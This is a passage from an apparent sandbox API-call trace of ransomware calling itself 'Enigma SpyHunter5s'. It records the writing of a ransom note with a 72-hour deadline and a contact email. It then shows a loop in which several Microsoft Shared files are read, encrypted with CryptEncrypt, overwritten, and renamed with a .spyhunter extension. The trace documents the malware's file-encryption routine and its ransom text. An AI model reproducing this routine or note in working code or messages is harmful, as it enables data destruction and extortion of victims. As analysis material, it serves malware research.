tag\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0089.551] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0089.551] WriteFile (in: hFile=0x16c, lpBuffer=0x270fc97*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fdc0, lpOverlapped=0x0 | out: lpBuffer=0x270fc97*, lpNumberOfBytesWritten=0x270fdc0*=0x127, lpOverlapped=0x0) returned 1 [0089.552] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0089.552] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fdc0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fdc0*=0x2ac, lpOverlapped=0x0) returned 1 [0089.552] CloseHandle (hObject=0x16c) returned 1 [0089.553] GetProcessHeap () returned 0x2c0000 [0089.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373180 | out: hHeap=0x2c0000) returned 1 [0089.553] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd60 | out: pbBuffer=0x270fd60) returned 1 [0089.553] GetProcessHeap () returned 0x2c0000 [0089.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0089.553] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fd58*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fd58*=0x30) returned 1 [0089.553] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\smarttaginstall.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0089.559] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe") returned 80 [0089.559] StrStrW (lpFirst="SmartTagInstall.exe", lpSrch=".txt") returned 0x0 [0089.559] GetProcessHeap () returned 0x2c0000 [0089.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37f868 [0089.559] ReadFile (in: hFile=0x16c, lpBuffer=0x37f868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd1c, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesRead=0x270fd1c*=0x2800, lpOverlapped=0x0) returned 1 [0089.561] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.561] WriteFile (in: hFile=0x16c, lpBuffer=0x37f868*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fd1c, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesWritten=0x270fd1c*=0x2800, lpOverlapped=0x0) returned 1 [0089.561] GetProcessHeap () returned 0x2c0000 [0089.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37f868 | out: hHeap=0x2c0000) returned 1 [0089.561] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.562] WriteFile (in: hFile=0x16c, lpBuffer=0x270fd5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd1c, lpOverlapped=0x0 | out: lpBuffer=0x270fd5c*, lpNumberOfBytesWritten=0x270fd1c*=0x4, lpOverlapped=0x0) returned 1 [0089.562] WriteFile (in: hFile=0x16c, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd1c, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x270fd1c*=0x30, lpOverlapped=0x0) returned 1 [0089.562] CloseHandle (hObject=0x16c) returned 1 [0089.563] GetProcessHeap () returned 0x2c0000 [0089.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0089.563] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe.spyhunter") returned 90 [0089.564] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\smarttaginstall.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\SmartTagInstall.exe.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\smarttaginstall.exe.spyhunter")) returned 1 [0089.564] GetProcessHeap () returned 0x2c0000 [0089.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0089.564] GetProcessHeap () returned 0x2c0000 [0089.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0089.564] GetProcessHeap () returned 0x2c0000 [0089.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329908 | out: hHeap=0x2c0000) returned 1 [0089.564] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd58 | out: pbBuffer=0x270fd58) returned 1 [0089.564] GetProcessHeap () returned 0x2c0000 [0089.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0089.564] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fd50*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fd50*=0x30) returned 1 [0089.564] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mstag.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0089.698] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB") returned 70 [0089.698] StrStrW (lpFirst="MSTAG.TLB", lpSrch=".txt") returned 0x0 [0089.698] GetProcessHeap () returned 0x2c0000 [0089.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x340fe8 [0089.698] ReadFile (in: hFile=0x16c, lpBuffer=0x340fe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd14, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesRead=0x270fd14*=0x2800, lpOverlapped=0x0) returned 1 [0089.719] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.719] WriteFile (in: hFile=0x16c, lpBuffer=0x340fe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fd14, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesWritten=0x270fd14*=0x2800, lpOverlapped=0x0) returned 1 [0089.719] GetProcessHeap () returned 0x2c0000 [0089.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0089.719] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.719] WriteFile (in: hFile=0x16c, lpBuffer=0x270fd54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd14, lpOverlapped=0x0 | out: lpBuffer=0x270fd54*, lpNumberOfBytesWritten=0x270fd14*=0x4, lpOverlapped=0x0) returned 1 [0089.727] WriteFile (in: hFile=0x16c, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd14, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x270fd14*=0x30, lpOverlapped=0x0) returned 1 [0089.727] CloseHandle (hObject=0x16c) returned 1 [0089.729] GetProcessHeap () returned 0x2c0000 [0089.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0089.729] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB.spyhunter") returned 80 [0089.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mstag.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\MSTAG.TLB.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\mstag.tlb.spyhunter")) returned 1 [0089.730] GetProcessHeap () returned 0x2c0000 [0089.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0089.730] GetProcessHeap () returned 0x2c0000 [0089.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0089.730] GetProcessHeap () returned 0x2c0000 [0089.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37d558 | out: hHeap=0x2c0000) returned 1 [0089.730] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd58 | out: pbBuffer=0x270fd58) returned 1 [0089.730] GetProcessHeap () returned 0x2c0000 [0089.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0089.730] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fd50*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fd50*=0x30) returned 1 [0089.730] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0089.731] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT") returned 72 [0089.731] StrStrW (lpFirst="METCONV.TXT", lpSrch=".txt") returned 0x0 [0089.731] GetProcessHeap () returned 0x2c0000 [0089.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37f868 [0089.732] ReadFile (in: hFile=0x16c, lpBuffer=0x37f868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd14, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesRead=0x270fd14*=0x2800, lpOverlapped=0x0) returned 1 [0089.827] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.827] WriteFile (in: hFile=0x16c, lpBuffer=0x37f868*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fd14, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesWritten=0x270fd14*=0x2800, lpOverlapped=0x0) returned 1 [0089.827] GetProcessHeap () returned 0x2c0000 [0089.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37f868 | out: hHeap=0x2c0000) returned 1 [0089.827] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.827] WriteFile (in: hFile=0x16c, lpBuffer=0x270fd54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd14, lpOverlapped=0x0 | out: lpBuffer=0x270fd54*, lpNumberOfBytesWritten=0x270fd14*=0x4, lpOverlapped=0x0) returned 1 [0089.838] WriteFile (in: hFile=0x16c, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd14, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x270fd14*=0x30, lpOverlapped=0x0) returned 1 [0089.838] CloseHandle (hObject=0x16c) returned 1 [0089.872] GetProcessHeap () returned 0x2c0000 [0089.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0089.872] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.spyhunter") returned 82 [0089.872] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\METCONV.TXT.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\metconv.txt.spyhunter")) returned 1 [0089.873] GetProcessHeap () returned 0x2c0000 [0089.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0089.873] GetProcessHeap () returned 0x2c0000 [0089.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0089.873] GetProcessHeap () returned 0x2c0000 [0089.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3857c0 | out: hHeap=0x2c0000) returned 1 [0089.873] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd50 | out: pbBuffer=0x270fd50) returned 1 [0089.873] GetProcessHeap () returned 0x2c0000 [0089.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0089.873] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x270fd48*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x270fd48*=0x30) returned 1 [0089.873] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0089.889] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv") returned 71 [0089.889] StrStrW (lpFirst="Wks9Pxy.cnv", lpSrch=".txt") returned 0x0 [0089.889] GetProcessHeap () returned 0x2c0000 [0089.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0089.889] ReadFile (in: hFile=0x15c, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd0c, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x270fd0c*=0x2800, lpOverlapped=0x0) returned 1 [0089.897] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.897] WriteFile (in: hFile=0x15c, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fd0c, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x270fd0c*=0x2800, lpOverlapped=0x0) returned 1 [0089.898] GetProcessHeap () returned 0x2c0000 [0089.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0089.898] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.898] WriteFile (in: hFile=0x15c, lpBuffer=0x270fd4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd0c, lpOverlapped=0x0 | out: lpBuffer=0x270fd4c*, lpNumberOfBytesWritten=0x270fd0c*=0x4, lpOverlapped=0x0) returned 1 [0089.993] WriteFile (in: hFile=0x15c, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd0c, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x270fd0c*=0x30, lpOverlapped=0x0) returned 1 [0089.993] CloseHandle (hObject=0x15c) returned 1 [0089.994] GetProcessHeap () returned 0x2c0000 [0089.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0089.994] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv.spyhunter") returned 81 [0089.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv.spyhunter")) returned 1 [0089.995] GetProcessHeap () returned 0x2c0000 [0089.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0089.995] GetProcessHeap () returned 0x2c0000 [0089.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0089.995] GetProcessHeap () returned 0x2c0000 [0089.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37df78 | out: hHeap=0x2c0000) returned 1 [0090.013] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd50 | out: pbBuffer=0x270fd50) returned 1 [0090.013] GetProcessHeap () returned 0x2c0000 [0090.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0090.013] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fd48*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fd48*=0x30) returned 1 [0090.014] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.130] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM") returned 73 [0090.130] StrStrW (lpFirst="AXIS.ELM", lpSrch=".txt") returned 0x0 [0090.130] GetProcessHeap () returned 0x2c0000 [0090.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x340fe8 [0090.130] ReadFile (in: hFile=0x15c, lpBuffer=0x340fe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd0c, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesRead=0x270fd0c*=0x2800, lpOverlapped=0x0) returned 1 [0090.224] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.225] WriteFile (in: hFile=0x15c, lpBuffer=0x340fe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fd0c, lpOverlapped=0x0 | out: lpBuffer=0x340fe8*, lpNumberOfBytesWritten=0x270fd0c*=0x2800, lpOverlapped=0x0) returned 1 [0090.225] GetProcessHeap () returned 0x2c0000 [0090.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0090.225] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.225] WriteFile (in: hFile=0x15c, lpBuffer=0x270fd4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd0c, lpOverlapped=0x0 | out: lpBuffer=0x270fd4c*, lpNumberOfBytesWritten=0x270fd0c*=0x4, lpOverlapped=0x0) returned 1 [0090.344] WriteFile (in: hFile=0x15c, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd0c, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x270fd0c*=0x30, lpOverlapped=0x0) returned 1 [0090.344] CloseHandle (hObject=0x15c) returned 1 [0090.346] GetProcessHeap () returned 0x2c0000 [0090.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.346] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM.spyhunter") returned 83 [0090.346] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.elm.spyhunter")) returned 1 [0090.346] GetProcessHeap () returned 0x2c0000 [0090.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.346] GetProcessHeap () returned 0x2c0000 [0090.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0090.346] GetProcessHeap () returned 0x2c0000 [0090.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x386400 | out: hHeap=0x2c0000) returned 1 [0090.347] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fd48 | out: pbBuffer=0x270fd48) returned 1 [0090.347] GetProcessHeap () returned 0x2c0000 [0090.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0090.347] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x270fd40*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x270fd40*=0x30) returned 1 [0090.347] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0090.381] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF") returned 79 [0090.381] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0090.381] GetProcessHeap () returned 0x2c0000 [0090.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37f868 [0090.381] ReadFile (in: hFile=0xcc, lpBuffer=0x37f868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fd04, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesRead=0x270fd04*=0x50d, lpOverlapped=0x0) returned 1 [0090.392] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xfffffaf3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.392] WriteFile (in: hFile=0xcc, lpBuffer=0x37f868*, nNumberOfBytesToWrite=0x50d, lpNumberOfBytesWritten=0x270fd04, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesWritten=0x270fd04*=0x50d, lpOverlapped=0x0) returned 1 [0090.392] GetProcessHeap () returned 0x2c0000 [0090.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37f868 | out: hHeap=0x2c0000) returned 1 [0090.392] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.392] WriteFile (in: hFile=0xcc, lpBuffer=0x270fd44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fd04, lpOverlapped=0x0 | out: lpBuffer=0x270fd44*, lpNumberOfBytesWritten=0x270fd04*=0x4, lpOverlapped=0x0) returned 1 [0090.392] WriteFile (in: hFile=0xcc, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fd04, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x270fd04*=0x30, lpOverlapped=0x0) returned 1 [0090.392] CloseHandle (hObject=0xcc) returned 1 [0090.393] GetProcessHeap () returned 0x2c0000 [0090.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.393] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF.spyhunter") returned 89 [0090.393] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\COMPASS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\compass\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 